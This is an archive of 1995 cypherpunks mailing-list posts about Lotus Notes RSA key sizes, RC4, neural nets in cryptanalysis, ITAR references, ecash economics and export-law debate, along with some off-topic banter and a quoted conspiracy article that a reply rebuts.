From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie Kaufman/Iris <Charlie_Kaufman/Iris.IRIS@iris.com>
Date: Sat, 11 Nov 1995 00:59:09 +0800
To: bglassle <bglassle@kaiwan.com>
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <9511102035.AA6927@moe.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


>If anyone on the list has knowledge of the following items, I would be
>very gratefull.
>
>1)  What is the key size used by the USA licensed version?
>
Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
encryption in the exportable version and bigger keys for signatures in all
versions and for encryption in the USA version. I'm not sure I'm allowed to say
what the key size will be ahead of the product shipping.

>2)  Considering RC4 is a proprietary scheme, have there been any
>concerted efforts to validate it's strength or lack of?  If so, could
>you give a pointer to any documents I could review.
>
There has been considerable discussion of the security of RC4 on this list, and
some subtle (i.e. worrisome but not disasterous) weaknesses have been
found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
to date because it does not encrypt recognizable plaintext with the first few
bytes of the RC4 stream.

>...Bob Glassley
>

 --Charlie Kaufman
 (charlie_kaufman@iris.com)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 11 Nov 1995 03:46:09 +0800
To: tony266@vabeach.email.net
Subject: Re: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <199511101816.LAA02444@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 tony266@vabeach.email.net allegedly wrote:
>
> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...


Let's play "Find the Topicality"!  Pseudonymity and reputation
generation and propagation?  Text stego?  No..  Hm..



Wait!  I've got it!  Smithfield, Va is in the same state as certain
spook headquarters...


Bryce

signatures follow



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKOXAPWZSllhfG25AQGFKwP9EeXISObFh+aWcOH5ES+V4c3kZx5OcTgn
q6A30uYMEYQDSGTQsZjY3sa/x+MjdOt7LAQB9LvGqYgamWwLBdQAGC08vA0sUoR/
q+rb3JxgY10TFwG4pTbfjkFaCOMYw8uMD0hxpbtU0MaqGvQuhYJ58RGTGV39va0H
RPJISFM/DQc=
=J0e4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 10 Nov 1995 09:31:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Market Value of Web Pages
In-Reply-To: <acc79e46010210045c32@[205.199.118.202]>
Message-ID: <199511100143.AA22994@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>BTW - I don't think we should be talking about a penny/page cost because it
>>is way too high for the current market.  For example, my copy of Applied
>>Cryptography V2 cost about $.067/page AND came with the media to keep it
>>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>>also came with the media.  I would think that somewhere between 1/100 to
>>1/10 of a penny/page is closer to the current market value of the page
>>content.

>I expect this to someday change, and to pay for some things at a fraction
>of a cent per hit, some other things for a few cents a hit, and maybe even
>some things at dollars per hit.

The maths of ecash and web pages gets very interesting very quickly. If you
charge per page of a web server, $0.01 a page and you happen to be doing this
on a million-hits-a-day web server then you machine is earning you $10,000 
ecash bucks a day. How much is it to buy hardware and a link and set up
a nice web site everyone wants to visit? If it was left running you'd collect
$3,650,000 ecash bucks anually. That is just for browsing. Sales on top of that
via ecash (very low overheads relative to physical means) would mean very
high profits. 1% of browsers spending US$50 is US$500,000 a day, or per year
it is US$182,500,000. Not bad for an outlay of a couple of fast SPARCs and
a quick net link and some staff to maintain it.

If you toss arguements like this at some of the sites that would be viable for
the hit numbers and then explain the only way that will occur is if the crypto
laws are repealed, you will create a lot more lobbiers annoying their reps
for the cause. ecash without good crypto is like the Federal Reserve
deliverying cash with open pickup trucks. Or doing credit card purchases on
postcards.

Cheers,
Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 14 Nov 1995 08:17:24 +0800
To: John Young <cypherpunks@toad.com
Subject: YOU_luz
Message-ID: <199511111824.KAA02105@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 1995 04:35:02 +0800
To: Atp3000@aol.com
Subject: Re: coding and nnet's
Message-ID: <199511101952.LAA24819@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 11/10/95 -0500, Atp3000@aol.com wrote:
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication of
>neural networks in cryptography.

Schneier's 2nd edition says "Neural nets aren't terribly useful for
cryptography,
primarily because of the shape of the solution space.  Neural nets work best for
problems that have a continuity of solutions, some better than others.  
This allows a neural net to learn, proposing better and better solutions as
it does.
Breaking an algorithm provides for very little in the way of learning
opportunities:
You either recover the key or you don't. (At least this is true if the
algorithm is
any good.)  Neural nets work well in structured environments when there is
something 
to learn, but not in the high-entropy, seemingly random world of cryptography."
And he doesn't give any references.

That's been my opinion of the issue as well; I looked into it a bit when I was
doing a project with the neural net folks back at Bell Labs, partly because
neural net chips typically have lots and lots of parallel bit-sized horsepower.
Unfortunately, the horsepower isn't arranged in ways that are very useful for
crypto;  adding together a large bunch of short chunks of data (maybe using
floating
point addition) and thresholding the sum isn't the right thing to do with
highly discontinuous functions.  You could take a similar chip design and
connect
the pieces together differently to make a brute-force searcher, i.e. take a gate
array and wire it to do crypto-like calculations, but the neural net stuff
doesn't do that very efficiently.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Sat, 11 Nov 1995 02:03:53 +0800
To: cypherpunks@toad.com
Subject: Yvette
Message-ID: <9511101244.S12252920@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
is...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 13 Nov 1995 11:56:20 +0800
To: an237621@anon.penet.fi
Subject: Re: Yvette
In-Reply-To: <199511101201.MAA00215@gears.efn.org>
Message-ID: <Pine.SOL.3.91.951110125015.10954B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995 an237621@anon.penet.fi wrote:

> : tony266@vabeach.email.net allegedly wrote:
> : I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> : is...
> Yes, there is a cow on the lawn.

Y vette when you can have it now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sat, 11 Nov 1995 01:45:44 +0800
To: raph@CS.Berkeley.EDU
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <m0tDsG2-0002duC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Raph" == Raph Levien <raph@CS.Berkeley.EDU> writes:

    Raph> Since RSA decryption is cubic in key size, it takes about
    Raph> twenty times as long to sign or decrypt a message. Since

Actually Sedgewick shows an algorithm that runs in O(N*N*log N). 

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKNApkyjTSyISdw9AQHSVQP/eUBnTOX/kzZU4/T3w/60mnj0GpT88Saa
qsgLq3N2b2U2lOOmQYE5JGb9FTds/3Hj9kxKMGxmSlyt3nOjgWmAKLJf5AvDMY1Y
MzSVaswzst/EyQYeQBZcUl+ahy3HFLLR8CUMX/IIeJS0w3iJbW4FNsmsTqCf/7Tg
p1Pa+TXQKYk=
=Vrsb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.d.stumbles@reading.ac.uk (John Stumbles)
Date: Fri, 10 Nov 1995 21:47:02 +0800
To: cypherpunks@toad.com
Subject: Re: INFO BLACKOUT _fwd_
Message-ID: <"mail2.readin:061930:951110131700"@reading.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I saw this on the NZ.general newsgroup and had to share it with the list. 
'fraid it's just the reply - the  original must've expired by the time 
I got there (and I couldn't be bothered to go looking for an archive to 
track it down in).

Enjoy...

>ab330@torfree.net (Bob Allisat) wrote:
>
>
>>Powerful national security insiders have established effective control
>>over the entrance gateways to the Internet. Disturbing signs are now 
>>emerging that the "information superhighway" has been targeted for 
>>systematic surveillance and political dossier-building on Americans'
>>opinions.
>
>	Oh, really?
>
>>SAIC is a $2 billion defense and FBI contractor with a board of
>>directors that reads like a Who's Who of the intelligence community.
>>Board members include Admiral Bobby Ray Inman, the former director of
>>the National Security Agency (NSA) and deputy director of the CIA; Melvin
>>Laird, defense secretary under Richard Nixon; Donald Hicks, former head
>>of research and development for the Pentagon; Donald Kerr, former head
>>of the Los Alamos National Laboratory; and General Maxwell Thurman 
>>(ret.), the commander of the U.S. invasion of Panama.
>
>>The corporation also has a legion of computer network specialists and
>>an entire division of computer consultants. 
>
>		As does IBM, DEC, AT&T, MicroSoft, shal I go on?
>
>>SAIC currently holds contracts
>>for re-engineering the Pentagon's information systems, automating the
>>FBI's computerized fingerprint identification system, and building a
>>national criminal history and information system.
>
>	Nope, I believe that's DISA's job now (was DCA)
>
>>The Internet is a marvel of computer softward technology. It was designed
>>to survive a nuclear attach on the United States--like the Post Office,
>>it's literally smart enough to find a way to get the mail through even if
>>most of the network is missing.
>
>	Wow, TCP/IP is a marvel?  this guy must hate Novell.
>
>>But control of the Internet domain name registration means the ability
>>to remove troublesome--or outspoken--computer systems from the network.
>>Potentially, this control also confers the power to insinuate "phantom"
>>domains into the network--for surveillance purposes, for example,--or
>>for real-time, automatic censorship.
>	So the government can wipe out all nameservers at once?  This is
>geting better....
>
>>Furthermore, anecdotal evidence gathered by this author (Matthews)
>>suggests that actual "truth control" is taking place on the net now.
>>E-mail messages with controversial contents--including details of the
>>SAIC takeover of domain names--have consistently disappeared as they
>>travel across the network. News items concerning the Vincent Foster
>>"suicide" investigation and allegations of NSA bank spying through
>>compromised Inslaw softward are being quickly and automatically 
>>cancelled. And the cancellations are not by their authors.
>
>	Must be a bad MX server somewhere.
>
>>With domain names under the control of secret government insiders, it
>>is even theoretically possible that large parts of the Internet could
>>be shut down and silenced at critical times. This could be accomplished
>>by suddenly altering domain name registration or interposing compromised 
>>"domains" at critical points. These compromised systems could serve as
>>"black holes" at critical times, stopping e-mail and important news
>>from reaching the world -- or the rest of the country.
>
>	Well that means well just have to use IP addresses, right?
>
>>Exercises in "turning the Internet off" have already taken place in
>>Taiwan and Hong Kong. In Taiwan the 'net was successfully shut down.
>>All network traffic--including news, opinions, and e-mail sent by computer
>>users was successfully "bottled up" on the island and prevented from
>>reaching the world.
>
>		It sure is easy to cut an island off, but a continent or more?
>
>>In Hong Kong the Internet wasn't quite strangled, but the British auth-
>>orities who control that colony managed to throttle free electronic speech
>>with the rest of the world until everything was bottlenecked into a few
>>little-known satellite links.
>
>>These are alarming precedents and sure signs that powerful, shadowy
>>forces are preparing to chop at the very roots of America's new Liberty
>>Tree. The secretive people on the board of directors of SAIC are intelli-
>>gence professionals skilled at manufacturing events--and then 
>>manufacturing public opinion and consent by controlling the truth. Will 
>>Internet disinformation, censor-ship or "shutdowns" signal the next American
>>crisis?
>
>	So, you basically said that the government is willing to cripple
>itself by shutting down the Internet and MILNET.  This guy needs a
>kick in the teeth or something to wake him up.  Next thing you know is
>that he'l claim to be abducted but CIA agents posing as Elvis
>impersonators.  And he'll start believing elis still lives.
>
>		-Dale
>

John Stumbles                                      j.d.stumbles@reading.ac.uk
Computer Services, University of Reading       http://www.rdg.ac.uk/~suqstmbl 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Sat, 11 Nov 1995 03:55:39 +0800
To: cypherpunks@toad.com
Subject: This is for YOU...
Message-ID: <9511101324.S12358809@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


Yvette...  Didn't LL Cool J make a song about you..."Dear yvette"...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.Y@freedomnet.com (David Y)
Date: Sat, 11 Nov 1995 03:00:15 +0800
To: cypherpunks@toad.com
Subject: mailing list.
Message-ID: <8160284964304@.freedomnet.com>
MIME-Version: 1.0
Content-Type: text/plain



Please put me on your mailing list, thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Sat, 11 Nov 1995 04:16:00 +0800
To: tony266@vabeach.email.net
Subject: Re: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <9511101938.AA17624@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...

The chair is against the wall and the deer eats her beef jerkey
savegely.

Greeting Camrade, I am glad to have finally been activated.  My first
order is to kill the person(s) who activated me.  Sorry tony, but
you must die.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 11 Nov 1995 06:50:37 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Online ITAR and AECA; Bibliography of export control books
Message-ID: <9511102207.AA29317@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >    Where can one get a copy of ITAR ? Secondly , has anyone written any 
> > books on the subject and if so who and what?

The ITAR is a regulation, not a law.  You can find it via my crypto
export control page at http://www.cygnus.com/~gnu/export.html under
"State Department export guidance".  Or at
ftp://ftp.cygnus.com/pub/export/itar.in.full.  It's 380 kbytes
(but ignorance of it is no excuse!).

That regulation is authorized by the Arms Export Control Act (AECA), a
law (22 USC Sec. 2778).  The law is also available in the same places.
It's only 40 Kbytes.

I own and can recommend several books on export controls.

Layman's books on general export controls and technology policy issues:

90-26801:   Finding common ground : U.S. export controls in a changed
     global environment /  Washington, D.C. : National Academy Press, 1991.
     xviii, 390 p. : ill. ; 24 cm.
     LC CALL NUMBER: HF1414.5 .F56 1991

87-34877:   Technology transfer : a policy model / Philip A. Roberts.
     Washington, DC : National Defense University Press, 1988.  xiii, 86 p.
     ; 21 cm.  LC CALL NUMBER: HC110.T4 R62 1988 SERIES TITLE: A National
     security essay DEWEY DEC: 338.973/06 dc19

93-50697:   Silencing science : national security controls and scientific
     communication / Harold C. Relyea.  Norwood, NJ : Ablex Pub., c1994. 
     xvii, 248 p. ; 23 cm.  LC CALL NUMBER: Q223 .R45 1994.  
     SERIES TITLE: Information management, policy, and services.
     DEWEY DEC:  338.97306 dc20.  ISBN:  156750096X; 1567500978 (pbk.)

Lawyer's Tome on export controls, with detailed case citations and such:

91-37498: Root, William A.  United States export controls /  3rd ed.
     Englewood Cliffs, NJ : Prentice Hall Law & Business, c1991-  1 v.
     (loose-leaf) : ill. ; 26 cm.  ISBN:  0139529381
     LC CALL NUMBER: KF1987 .L54 1990.  DEWEY DEC:  353.0082/76 dc20
     [This one is loose-leaf and gets annual updates at $80/year.  I forget
      how much it cost originally.]

By the way, if you're trying to find general references on export
controls or crypto, or anything else, I recommend
`telnet://locis.loc.gov' and searching the Library of Congress card
catalog or the copyright records.  The user interface is IBM mainframe
oriented, but the information is without peer.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Atp3000@aol.com
Date: Sat, 11 Nov 1995 04:07:48 +0800
To: cypherpunks@toad.com
Subject: coding and nnet's
Message-ID: <951110141713_18585763@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks!
I just resently got interested in coding and cryptography, and I was
wondering if you could suggest 3 or 4 papers that adresses the aplication of
neural networks in cryptography.
Thank's I really appreciate your time and consideration!
Atp3000




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 11 Nov 1995 04:19:13 +0800
To: Atp3000@aol.com
Subject: Re: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <199511101936.OAA21643@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Atp3000@aol.com writes:
> cypherpunks!
> I just resently got interested in coding and cryptography, and I was
> wondering if you could suggest 3 or 4 papers that adresses the aplication of
> neural networks in cryptography.
> Thank's I really appreciate your time and consideration!

I personally know of none. I'm not sure how one would apply neural
networks to cryptography, frankly, or even what use one might imagine
making of them.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kawika Daguio <KDAGUIO@aba.com>
Date: Sat, 11 Nov 1995 04:34:58 +0800
To: Cypherpunks@toad.com
Subject: SPAM:E-CA$H Conference SF 11/16-17
Message-ID: <s0a3753c.047@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


COMMERCIAL - SPAM ALERT -

I will be speaking at a conference on Electronic Money
that might interest some of you sitting on some extra rEeal Money
who also suffer from the burning desire to find out what 
ideas and technology other folks are flogging on the talk-circuit.

The brochure is too long to type in but some excerpts follow:

      10 key questions to be answered at this 
       critical industry event:
       
       10.  What are the biggest avenues to entry into the world
            of electronic commerce?
        9.  Who will be the biggest users of electronic money?
        8.  Who should be allowed to issue E-cash?
        7.  How will debit and checking fit in with the electronic
            money future?
        6.  How do you balance privacy, security, and efficiency in 
            E-cash systems?
        5.  How can electronic commerce be used for a business
            advantage?
        4.  How will the government regulate E-cash?
        3.  How will electronic payment systems protect against
            fraud?
        2.  What infrastructure is needed to provide security
            on open networks?
        1.  What are the leading technologies that will be used for 
            E-cash?

Speakers:

Ernest Brickell
Bankers Trust Electronic Commerce

Richard K. Crone
Center for Electronic Banking, KPMG Peat Marwick

ME

John Doggett
Bank of Boston

Peter Gemmel
Sandia National Laboratories

Gail Grant
Open Market

Edward Hogan
MasterCard International

Randy Kahn
First Interstate of California

Michael Killen
Killen and Associates

Steve Kimmey
Tandem Computers

Paul Lambert
Barnett Banks

Ron Laurie
McCutchen, Doyle, Brown and Enersen

Scott Loftesness
First Data Corporation

Greg McKenzie
Canadian Imperial Bank of Commerce

B. Clifford Neuman
University of Southern California

Deborah Owen
Arent Fox Kinter Plotkin and Kahn

Daniel Schutzer
Citibank
Financial Services Technology Consortium

Bill Washburn
Mecklermedia

Magdalena Yesil
CyberCash 

Sponsor: IBC USA Conferences

Date:  November 16 - 17

Venue: Pan Pacific Hotel
       500 Post Street
       San Francisco

EMAIL: questions or registrations
       skeyles@ibcusa.com

Phone: 508.481.6400 ext 282 (Sherry)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 11 Nov 1995 07:30:29 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511102255.OAA10734@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:17 11/10/95 -0500, Atp3000@aol.com wrote:
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication of
>neural networks in cryptography.

Perhaps neural nets could be used in an unknown plain text, brute force
attack to automatically select possible decryptions for human examination. 
I don't know of any papers on the subject.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 11 Nov 1995 06:16:21 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511102145.QAA06533@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>This all has to happen whenever you click on a link in your browser.
>Even with fast CPU's I think the extra step of connecting to the bank,
>having it check against all coins, and getting approval will be
>considerable for each link traversal.

A system like Stephen Brands' should significantly improve the
situation.  There's no benefit in double-spending micropayments since
you'll be identified after the fact.  For small enough payments, you
can skip the on-line validation and handle them in batch-mode later.
It becomes a matter of risk management, then.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 11 Nov 1995 08:18:19 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511102353.PAA15671@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995, Peter D. Junger wrote:

> In any case, I want to thank him for doing so, because it brought home
> to me the important fact that it is possible that the ITAR provisions
> relating to cryptographic software could be struck down, not because
> they violate the first amendment, or would violate it if passed by
> congress, and not because the court is trying to dodge the difficult
> first amendment issue, but simply because the provisions are not
> authorized by any legislation.

Hmmm, Peter actually has me worried.  I actually _understood_ what he was
talking about.  And that has me worried.

I guess that reviewing all that LIBOR financing documentation over ten
years ago, when I was extending a helping hand to the CIBC helped.  No one
should ever attempt to figure out what happens when you have an American
highrise owned by a private Canadian citizen, go into receivership with a
syndicated Euro-financing while attempting a head lease to AT&T. 

An experience like that leaves you scarred for life.  You actually learn 
to grok "lawyer speak".

I guess that an interesting follow up occurs, if I perhaps muddy the 
chrystal clear waters of Peter's analysis.  It relates to another thread 
on this list, the thread on time-release crypto and the economics of 
information.  

A hypothetical which might clarify by making things murky.

If I ... as a foreign citizen ... a Canadian ... were to release an
algorithm for time-release crypto to another Canadian ... another
foreigner, could I actually be hauled down by the scruff of my neck to
face US style "justice".  Could I be deprived of our Canadian traditions of 
Napoleonic Code and of British Common Law, to face Americanism's.

Does anyone from State have any clarification of this policy-shift??

I find it ridiculous to hear that if I load a series of messages into a
fax machine, and instruct that machine to send out a series of documents
at some set point in time -- and that if I were to *communicate* this
method of time delay cryptographically secure communication to another
Canadian citizen, that I could actually be hauled out of my own country
and dragged across an international border to face charges of treason 
against a state to which I have no allegiance. 

This would be laughable, if it weren't so sinister.  I mean, it's only a 
FAX machine ... for goodness sake's.

Here I am as a Canadian citizen, a citizen of a sovereign State, a state
which has historically been a friend of the American people.  A State
which has actually sacrificed its own international stature and the
security of its citizens, to benefit Americans.  (Most notably, when
Canada rescued the hostages in Iran) and America repays the citizens of
Ambassador Ken Taylor's home town how??  With an implied threat of making
them subject to US law because its administratively convenient? 

Indeed.

Can't anyone find acts of treason, a little closer to home??

Domestically maybe ... possibly even right under your nose ...

>   It's too far off topic to pursue any further, but I must take
>   exception to the suggestion that we are well served by separation of
>   powers intruding into other legal domains.  Bowsher tells us that
>   causation principles go out the window in SOP cases.  That alone
>   makes it radioactive.

You ain't whistling Dixie.

> I must admit that I don't know what it is that he is refering to.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli@GS160.SP.CS.CMU.EDU
Date: Sat, 11 Nov 1995 05:30:33 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Message-ID: <9511102101.AA27849@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Charlie Kaufman writes:
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both
>the USA and exportable versions.

512-bit RSA is exportable?  I'm surprised.  It would be interesting
to CJR a known-secure binary for 512-bit RSA, attempting a little
differential cryptanalysis on the NSA's practices.  A fair test would
require that you have the political clout of Lotus/IBM, though.

--
   Eli Brandt
   eli+@cs.cmu.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 14 Nov 1995 03:22:33 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
In-Reply-To: <acc933c500021004a249@[205.199.118.202]>
Message-ID: <199511110125.RAA04930@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> At 7:52 PM 11/10/95, Bill Stewart wrote:

>>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>>cryptography, primarily because of the shape of the solution space.
>>Neural nets work best for problems that have a continuity of solutions,
>>some better than others.  This allows a neural net to learn, proposing
>>better and better solutions as it does.  Breaking an algorithm provides
>>for very little in the way of learning opportunities:  You either recover
>>the key or you don't. (At least this is true if the algorithm is any
>>good.) Neural nets work well in structured environments when there is
>>something to learn, but not in the high-entropy, seemingly random world of
>>cryptography."
>>And he doesn't give any references.
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
> on the usefullness of AI and neural nets for crypto. Sounds almost like
> exactly the paragraph I wrote, in fact.

As it happens, I saved that one, because I thought the "needle standing up
from a flat plain" metaphor was so apt; I've used it in a couple of talks
without remembering where I got it.  Here's your message to sci.crypt:

  From: tcmay@netcom.com (Timothy C. May)
  Subject: Re: Neural nets & Crypto
  Message-Id: <tcmayCuBz0q.739@netcom.com>
  Date: Wed, 10 Aug 1994 17:53:13 GMT

  Neural nets are not likely to do well with modern ciphers (e.g., RSA,
  IDEA, DES, etc.), mainly because of the shape of the solution space.

  Instead of the "rolling hills and valleys" that neural nets (and
  related methods, such as genetic algorithms, simulated annealing,
  etc.) do well in, the solution space for modern ciphers offers very
  little in the way of "learning" opportunities: you either have the
  solution (the key), or you don't.

  Think of a needle standing up from a flat plain...a NN or any other
  hill-climber could wander for years and never find it.

  I suspect there are uses in peripheral aspects, such as guessing
  passwords (when people have not picked high-entropy passwords, but
  have instead used familiar names). Or in traffic analysis.

  But the move in modern cryptology is definitely away from using
  anything with "structure" that can be learned. Put another way, neural
  nets and such work well in structured environments, where there's
  something to _learn), but not in the high-entropy, seemingly random
  world of encrypted data.

  --Tim May

A subsequent message (which I also saved) dealt with genetic programming
and was also interesting.

	Jim Gillogly
	21 Blotmath S.R. 1995, 01:22




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 09:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <acc933c500021004a249@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM 11/10/95, Bill Stewart wrote:

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography,
>primarily because of the shape of the solution space.  Neural nets work
>best for
>problems that have a continuity of solutions, some better than others.
>This allows a neural net to learn, proposing better and better solutions as
>it does.
>Breaking an algorithm provides for very little in the way of learning
>opportunities:
>You either recover the key or you don't. (At least this is true if the
>algorithm is
>any good.)  Neural nets work well in structured environments when there is
>something
>to learn, but not in the high-entropy, seemingly random world of cryptography."
>And he doesn't give any references.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
on the usefullness of AI and neural nets for crypto. Sounds almost like
exactly the paragraph I wrote, in fact.

And I recollect that Bruce dropped me a note saying I made the point
succinctly and that he wanted to use what I said in his next edition. (My
recollection at least, but I don't have any easy way anymore of searching
my several hundred megs of accumulated mail, articles, etc.)

I have no problem with Bruce using my points. I hope he didn't use my
_exact_ words, though. But not a cosmic issue.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 11 Nov 1995 08:46:43 +0800
To: cypherpunks@toad.com
Subject: Re: Yvette
Message-ID: <199511101724.RAA09597@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just another Detweiler Tentacle......

Love Always,

Carol Anne Tentaclefinder

>> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
>> is...
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
